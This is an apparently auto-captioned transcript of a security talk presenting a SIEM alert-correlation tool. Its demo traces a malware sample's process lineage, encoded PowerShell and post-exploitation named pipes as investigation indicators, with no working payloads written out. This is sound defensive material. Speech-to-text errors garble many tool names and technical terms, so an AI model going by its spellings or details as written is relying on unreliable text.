From Noise To Insight: Supercharge Your SOC With Automated Alert Correlation

thank you hello everyone and welcome to my talk on uh transforming noise into Insight through um automation a little bit about me uh my name is ano uh I currently work as a security consultant at the University of Le um I'm also a researcher and am passionate about automated investigations uh some of what I'm going to discuss today includes uh fractional features usually found on expensive EDR dashboards but I'll talk about how to replicate them using free or open source tools especially for those with limited security budget so uh what are we aiming to uh achieve here in a traditional Sim setup your endpoint and network devices send their logs to your sim where the detection engine uh evaluates

those logs and generates alerts um as needed at this point an analyst has to review those alerts um correlate the data and perform investigations uh what we're going to do we're going to introduce a tool that will um automatically pick up those alerts extract uh relevant information run correlated searches uh summarize the findings into a report and store that report into a different index so I've been working on a tool called uh kibal cor and when I started working on it I was a one person Army doing the job of five and I wanted to automate some of the correlation task uh during investigations I also wanted to automatically detect and the offis gate uh fated

Powershell and ultimately I wanted to streamline the process of um adding context to an alert um to speed up the identification and scoping process for this I used uh an elastic seam with a basic license um I leverage Nate Windows native event logs as well as cismon logs uh quick reminder on sysmon Sison um it's an agent that you can install on your endpoints that will um record several actions performed by a process uh on that system when a new process is created uh cismon uh automatically generates a globally unique identifier and assigns it to that process it also records information about the user that started that process as well as the parent process if there is one

uh subsequently when that process performs other actions on your system Sison will record the relevant event and to tie those events back to the original process create event um cismon will copy that process grate to the uh subsequent event uh currently from an event perspective uh cismon can uh create events when a process performs any of the actions are listed here here are the um event IDs the ones highlighted in red are the ones that do not have a process goid because um they're not tied to a specific process so let's say we are alerted by um an alert is triggered by a DNS event for example I don't know maybe someone accessed a domain that was registered

less than 2 months ago by using the process go on the event um as our reference point we can find out all the actions taken by that process on the system next if we find out the GID of the parent we can and use that as our new reference point we can find out all the actions taken by the parent on the system by using the same logic we can find out what the parent of the of the parent was which I call ancestor one to start with uh because otherwise the lineage becomes very complicated so I just call it ancestor one and as we go up the chain um I just increment the number as we go

up um if you come back to the original process we can find out all the good of his children and if we use that as reference for correlation we can find out um we can do the same thing going down so now when we are alerted on an action taken by a process on the system we can automatically put some context around it and establish where did it come from and where did it go if we can find out the user name and the log on ID we can Cy buil an event Windows event logs to find out um other actions taken by that user at this time um on that system think like how did

they get onto that system was it um was it a Hands-On keyboard log on was the network log on was the RDP what was the source IP and so on there are many techniques that can be used to elevate your privileges on a Windows system and some are stealthier than others so depending on what technique was used to obtain admin access there might be an event log uh that was loged to to reflect that things like um special privileges assigned to uh a new log on the existence of a link Lo log on ID and so on we can also pull up all notable actions I mean security related actions uh taken by that user on that system

things like user and group management um schedule tax management uh service management event LW cleared and so on we can also um add HR information now for this it will it requires either you synchronizing some of your HR information into an index um into your seam or if your HR System offers an API that can be leveraged the two can do that and some of the information that we cannot here includes the user status are they still employed with us are their Department or unit and in this case let's say you see somebody running power shell if there is this admin maybe that's okay but if they're from marketing that's probably something you need to take seriously right

away uh we can add their contacts their location their manager so that if you need to reach out to someone that information is right there quite often uh during investigation you come across things like this basic toy encoding in the process command line and attackers and red teamers will do this to hide what they are doing and what you typically have to do at this point is identify and extract the basics to4 yourself move away from your seam into a different tool to try and and decode it and plus they will use uh multiple layer of layers of off fisc to make your job as an investigator more difficult and challenging um and it it typically looks like this they

take a payload do something to it do something else to it and then do something else to it and they will throw all kinds of things in the uni code binary exor compression encryption there are so many possibilities and to reverse it you have to do the exact same thing but in Reverse so typically the easiest things to do is decode the bay 64 but you often end up with some more garbage now you have to work out what that garbage is so that you can reverse it and again there are tools out there that will allow you to do this but they require you taking the information out of your C into one tool

and sometime you have to move to another Tool uh depending on what you're dealing with so um what K call would this would do in this case is whenever he detect b64 in the process command line it automatically extract it decode the Bas 64 try to determine the next step so the data T that um got after the Bas 64 de code uh reverse it and keep doing it until it gets to something you can no longer deal with and as it goes through uh that process every time it detects a data type when it reverse it it records what it did just to give you um that full context directly within your seam so you

can understand um sometime when you have to make the call as in is this benign is it not based on um all the different type of encoding and notication step taken it can allow you to make that call um quickly um quite often when deating offc power shell you end up with plain aski but you still can't understand what they're trying to do because they will throw um they will use aliases short-handed versions of commands stream based manipulation techniques and in this case we can use the power shell abstract SX tree to revert some of that stuff so um Talco is written uh in Python and Powershell and can run as a Linux service a Crome job or ad hoc and um

when events are sent into elastic uh kibana creates an alert um kibako will automatically pick up those alert uh perform correlation and um store the report the um detection engine in elastic is called kibana so uh and the tool name is short for kiban alert correlator so we're going to uh move into demo um to demo the features of the tool I used uh publicly available malware data from uh the Splunk attack range project so kudos to them um uh yeah in the demo setup I have uh a deployment of the elastic deployment of kibal core also use the hive Community Edition to facilitate the navigation between Thea sets So to avoid issues related to live

demos I pre-recorded a video of a typical K report which I'm going to play now with me

now there's a lot going on on the video but I added some arrows to help um you know keep track of what's going on and what I'm talking about um

so here we have an alert that was triggered because someone run a command that says show me all domain user accounts now is this a c admin is this common in your environment maybe you've seen this before and it was fine how do you know this time it's not the severity here says low so if you're receiving more alerts then you have time to investigate this is probably something you wouldn't prioritize at this time because you would be working on your higher severity alerts so let's check out the correlated report that was generated to see what additional context was added for this

[Music] alert the report is easier to read in Json format so let's switch to the Json view the first section contains information about the environment and the rule that was triggered so let's skip it and fast forward to the interesting part here we are looking at the process lineage that was generated it starts with ancestor number eight which was explorer.exe so we know the user probably had graphical access to the system explorer.exe had 20 children and we have summary information about them including their unique identifiers these children include cmd.exe Powershell 7zip and so [Music] on explorer was observed making network connections creating files setting registry values creating and connecting to named pipes and deleting files the

network connections were directed to public IP address that starts with 51 and ends with 159 and socket information shows that these connections were made on Port 443 we also have the list of Link files created by Explorer indicating the files or directories that the user may have accessed next in the lineage is ancestor number seven which is cmd.exe or Windows command processor and if we pay attention to the process command line we see that the user started CMD and change directory to the downloads [Music] folder CMD had one child process run the lor2 therefore the next ancestor number six is run the l32 which is a process that enables Windows to execute functions stored in dll files

here the command line reveals that run dl32 was invoked to run the function start W within the DL file named 1.dll given that we previously changed directory to the downloads folder we can infer that this dll file is located there so during the next phase of our investigation we should attempt to obtain a sample of this dll file provided that it hasn't been deleted yet run the 32 had one child process also run the l32 but this instance was located in the CIS 64 folder which on 64-bit systems is the 32-bit version of run DL 32 this indicates that the dll named 1.dll is a 32bit DL so next ancestor 5 is 32bit rundl 32

with the same command line arguments as before it has one child wg. exe next ancestor 4 is wmgr which is the Windows error reporting process it had eight children seven of them being instances of cmd.exe and one of them being a process located in the user stamp

folder this Windows error reporting process was observed performing network connections accessing other processes creating files and Performing DNS queries the network connections were directed to four public IP addresses and socket information reveals connections to the IP stud with 95 were made on Port 80 to the IP starting with 67 on Port 443 to the IP starting with 98 on Port 447 and to the IP starting with 104 on Port 443

it accessed the ls Source process and created two files one of them in the temp directory and another one in the sub directory of the rooming directory these were potentially downloaded through the above network connections we have all the DNS queries performed here some yielded responses While others did not we previously observed network connections to a public IP starting with 104 and now we know which DNS c will resolve to that IP similarly for the connection to the IP address starting with 95 we have identified the corresponding DNS query next ancestor number three was an instance of cmd.exe and here is what it command line arguments looked like it called Powershell and ped what looks like like a Bas 64 encoded

string this CMD process had one child power shell because B 64 was detected in the command line it was automatically extracted it then went through the de fisc process and here is what the result looks like even if we're not Powershell experts we can still look for keywords that will give us an indication of what the code is trying to do for instance the function I memory stream is commonly used to download an execute code directly in memory without writing to the file system a technique often employed by fileless malware Additionally the presence of a bite array typically used to store and execute malicious payloads in binary format directly from memory is another indicator of potential malicious

activity [Music] here are the steps that were recorded during the deop fisc process we decoded the B 64 data revealing some bites these bites were further decoded during which Unicode null bites were identified and cleaned up we then analyzed it using the power shell abstracts and TX Tre this process outlines how the code was off fiscated if you need to decode it again just follow these steps

now we go down to ancestor number two which was Powershell and we see all the command line arguments passed from cmd.exe with the same b64 encoded string as before this Powershell process had eight children including R32 CMD and Powershell itself it was seen performing network connections creating files creating and connecting to name pipes performing DNS queries and deleting files because B 64 was passed to CMD which then passed it to Powershell it means it was detected and de fiscated each times so this neisc block is similar to the previous one so let's skip it the network connections were directed to a public IP address starting with 23 and ending with 84 socket information shows these

connections were made on Port 80 we have the name pipe that was created by this process and the ones that were accessed their names start with the prefix postex name types with a prefix postex are typically associated with post exploitation activities in malware or attack

Frameworks next ancestor one was another instance of cmd.exe we see the command line arguments were net users domain it had one child the net command so natur that's going to be our parent in the process lineage and the command line arguments are the ones passed from [Music] CMD it had one child the net one command if we look at the command line argument we see that this is what triggered our alert so now based on the additional information provided by the report we not only know that something malicious is going on but we've also gathered numerous indicators of compromise such as domain names IP addresses file locations and these would be crucial for the next phase of our investigation

which is scoping

so we've demonstrated how um we can take an alert that most analysts can ignore if they are you know overwhelmed with you know hundreds of alerts and to deal with and we show how with the context added by the tool you know it basically to assess this it's basically how long it will take you to read a report to um you know determine that something malicious is going on also it's done a lot of the prec correlation and investigation for you so you have um you now have ioc's that you can start using to either block stuff on your firewall or um scope and see what other system may have been affected and things like that so and

that's why the tool is so valuable

questions can we get it I'm I'm still working on some uh features uh ideas and I'll publish it at some point just watch out for it does has any protection what if the virus itself dis as ofis version 15 is now runs as a protective process as as same as your EDR product so prior to version 15 yeah it was fairly easy to disable Sison on your system but it's now it now runs as a protective process as of version 15 that give you a hash every step of the attemped theis of the power what do you mean by hash yeah I mean the sh and md5 are taken from the uh signature of of the

process and now in this case everything uh within that chain were builing Windows processes that's why I didn't emphasize on the on the ashes because they those are builtin windows process in to begin with but when you are dealing with processes that they brought in or that they compiled on the Fly and things like that that's where it will tell you the hashes and that's when it can also be used to um for the uh scope Yeah question one more question you want can we use a slun instead of no now the um it will work with most s that have a Json you know back end the issue with Splunk is plun store different data set in different format

and having to accommodate all those format is pretty complicated it was much easier with elastic because everything is Json so I know exactly the format of what I'm going to get so it's easier to pass and um create a report so that's the only only challenge was spog I tried Spug but it was just very challenging if you got any more questions from set find him outside I'm sure he can talk for a long time about this it's an amazing product it's it is cool yeah feel free to ask him